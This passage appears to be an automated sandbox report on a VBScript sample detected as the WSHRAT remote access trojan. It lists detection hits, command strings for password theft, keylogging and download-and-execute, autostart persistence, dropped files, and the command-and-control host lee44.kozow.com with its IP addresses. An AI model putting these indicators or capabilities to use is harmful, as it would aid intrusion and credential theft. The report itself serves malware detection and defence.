                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: wscript.exe, 00000003.00000002.2596806001.000001E9CD34B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1682858553.000001E9CD346000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2595948700.000001F85FBE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2596539768.000001F861C6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
                            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct

                            Stealing of Sensitive Information

                            barindex
                            Yara detected WSHRAT
                            Source: Yara matchFile source: amsi64_8076.amsi.csv, type: OTHER
                            Source: Yara matchFile source: amsi64_5872.amsi.csv, type: OTHER
                            Source: Yara matchFile source: amsi64_480.amsi.csv, type: OTHER
                            Source: Yara matchFile source: dump.pcap, type: PCAP
                            Source: Yara matchFile source: 00000003.00000002.2596806001.000001E9CD392000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.2596539768.000001F861CCB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000003.1356330407.000001E9CB43A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.2596539768.000001F861CA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000003.1644848582.000001B7E7D1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000003.1564044312.000001F85FE1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000003.1640855197.000001B7E608A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000003.1355744491.000001E9CD449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.2596806001.000001E9CD36D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000003.1682858553.000001E9CD36D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000003.1640525306.000001B7E7D1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000003.1558907071.000001F861D89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.2596948186.000001F861D89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.2596539768.000001F861C6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.2597045534.000001E9CD449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.2595876491.000001E9CB221000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000003.1356488425.000001E9CD449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000003.1640874613.000001B7E7D1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.2595948700.000001F85FBE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000003.1645277445.000001B7E5E20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000003.1640631442.000001B7E7D1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000003.1564280890.000001F861D89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000003.1645147466.000001B7E5D80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 8076, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 5872, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 480, type: MEMORYSTR

                            Remote Access Functionality

                            barindex
                            Detected WSHRat
                            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string up-n-exec
                            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string get-pass
                            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string down-n-exec
                            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string keylogger
                            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string take-log
                            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string up-n-exec
                            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string get-pass
                            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string down-n-exec
                            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string keylogger
                            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string take-log
                            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string up-n-exec
                            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string get-pass
                            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string down-n-exec
                            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string keylogger
                            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string take-log
                            Yara detected WSHRAT
                            Source: Yara matchFile source: amsi64_8076.amsi.csv, type: OTHER
                            Source: Yara matchFile source: amsi64_5872.amsi.csv, type: OTHER
                            Source: Yara matchFile source: amsi64_480.amsi.csv, type: OTHER
                            Source: Yara matchFile source: dump.pcap, type: PCAP
                            Source: Yara matchFile source: 00000003.00000002.2596806001.000001E9CD392000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.2596539768.000001F861CCB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000003.1356330407.000001E9CB43A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.2596539768.000001F861CA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000003.1644848582.000001B7E7D1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000003.1564044312.000001F85FE1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000003.1640855197.000001B7E608A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000003.1355744491.000001E9CD449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.2596806001.000001E9CD36D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000003.1682858553.000001E9CD36D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000003.1640525306.000001B7E7D1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000003.1558907071.000001F861D89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.2596948186.000001F861D89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.2596539768.000001F861C6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.2597045534.000001E9CD449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.2595876491.000001E9CB221000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000003.1356488425.000001E9CD449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000003.1640874613.000001B7E7D1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.2595948700.000001F85FBE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000003.1645277445.000001B7E5E20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000003.1640631442.000001B7E7D1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000003.1564280890.000001F861D89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000003.1645147466.000001B7E5D80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 8076, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 5872, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 480, type: MEMORYSTR

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity Information421
                            Scripting                            		Valid Accounts11
                            Windows Management Instrumentation                            		421
                            Scripting                            		1
                            DLL Side-Loading                            		1
                            Disable or Modify Tools                            		OS Credential Dumping2
                            File and Directory Discovery                            		Remote Services1
                            Archive Collected Data                            		1
                            Ingress Tool Transfer                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts1
                            Exploitation for Client Execution                            		1
                            DLL Side-Loading                            		111
                            Process Injection                            		4
                            Obfuscated Files or Information                            		LSASS Memory12
                            System Information Discovery                            		Remote Desktop ProtocolData from Removable Media1
                            Encrypted Channel                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain AccountsAt121
                            Registry Run Keys / Startup Folder                            		121
                            Registry Run Keys / Startup Folder                            		1
                            Software Packing                            		Security Account Manager231
                            Security Software Discovery                            		SMB/Windows Admin SharesData from Network Shared Drive11
                            Non-Standard Port                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                            DLL Side-Loading                            		NTDS131
                            Virtualization/Sandbox Evasion                            		Distributed Component Object ModelInput Capture1
                            Remote Access Software                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            Masquerading                            		LSA Secrets1
                            Application Window Discovery                            		SSHKeylogging3
                            Non-Application Layer Protocol                            		Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                            Modify Registry                            		Cached Domain Credentials1
                            Remote System Discovery                            		VNCGUI Input Capture113
                            Application Layer Protocol                            		Data Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items131
                            Virtualization/Sandbox Evasion                            		DCSync1
                            System Network Configuration Discovery                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                            Process Injection                            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                            Hidden Files and Directories                            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1665235 Sample: ORDER-25013-67789543AX.vbs Startdate: 15/04/2025 Architecture: WINDOWS Score: 100 70 lee44.kozow.com 2->70 76 Sigma detected: Register Wscript In Run Key 2->76 78 Suricata IDS alerts for network traffic 2->78 80 Found malware configuration 2->80 82 17 other signatures 2->82 12 wscript.exe 3 2 2->12         started        16 wscript.exe 1 2->16         started        18 wscript.exe 2->18         started        20 wscript.exe 2->20         started        signatures3 process4 file5 58 C:\Users\user\AppData\Local\Temp\rHMh.js, ASCII 12->58 dropped 100 Benign windows process drops PE files 12->100 102 Detected WSHRat 12->102 104 VBScript performs obfuscated calls to suspicious functions 12->104 110 3 other signatures 12->110 22 wscript.exe 1 15 12->22         started        106 Wscript called in batch mode (surpress errors) 16->106 26 wscript.exe 16->26         started        108 System process connects to network (likely due to code injection or exploit) 18->108 signatures6 process7 dnsIp8 74 172.245.208.13, 49716, 80 AS-COLOCROSSINGUS United States 22->74 92 System process connects to network (likely due to code injection or exploit) 22->92 94 Windows Scripting host queries suspicious COM object (likely to drop second stage) 22->94 28 wscript.exe 3 22->28         started        signatures9 process10 file11 60 C:\Users\user\AppData\Local\Temp\notepad.js, ASCII 28->60 dropped 62 C:\Users\user\AppData\Local\Temp\adobe.js, ASCII 28->62 dropped 31 wscript.exe 2 28->31         started        34 wscript.exe 1 8 28->34         started        process12 dnsIp13 64 C:\Users\user\AppData\Local\Temp\JaG.exe, PE32 31->64 dropped 38 JaG.exe 4 31->38         started        72 lee44.kozow.com 104.168.7.12, 49717, 49718, 49725 AS-COLOCROSSINGUS United States 34->72 66 C:\Users\user\AppData\Roaming\...\adobe.js, ASCII 34->66 dropped 84 Creates multiple autostart registry keys 34->84 file14 signatures15 process16 signatures17 86 Multi AV Scanner detection for dropped file 38->86 88 Tries to delay execution (extensive OutputDebugStringW loop) 38->88 90 Hides that the sample has been downloaded from the Internet (zone.identifier) 38->90 41 cmd.exe 38->41         started        44 cmd.exe 38->44         started        process18 signatures19 96 Uses ping.exe to sleep 41->96 98 Uses ping.exe to check the status of other devices and networks 41->98 46 reg.exe 41->46         started        49 PING.EXE 41->49         started        52 conhost.exe 41->52         started        54 conhost.exe 44->54         started        56 PING.EXE 44->56         started        process20 dnsIp21 112 Creates multiple autostart registry keys 46->112 68 127.0.0.1 unknown unknown 49->68 signatures22

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.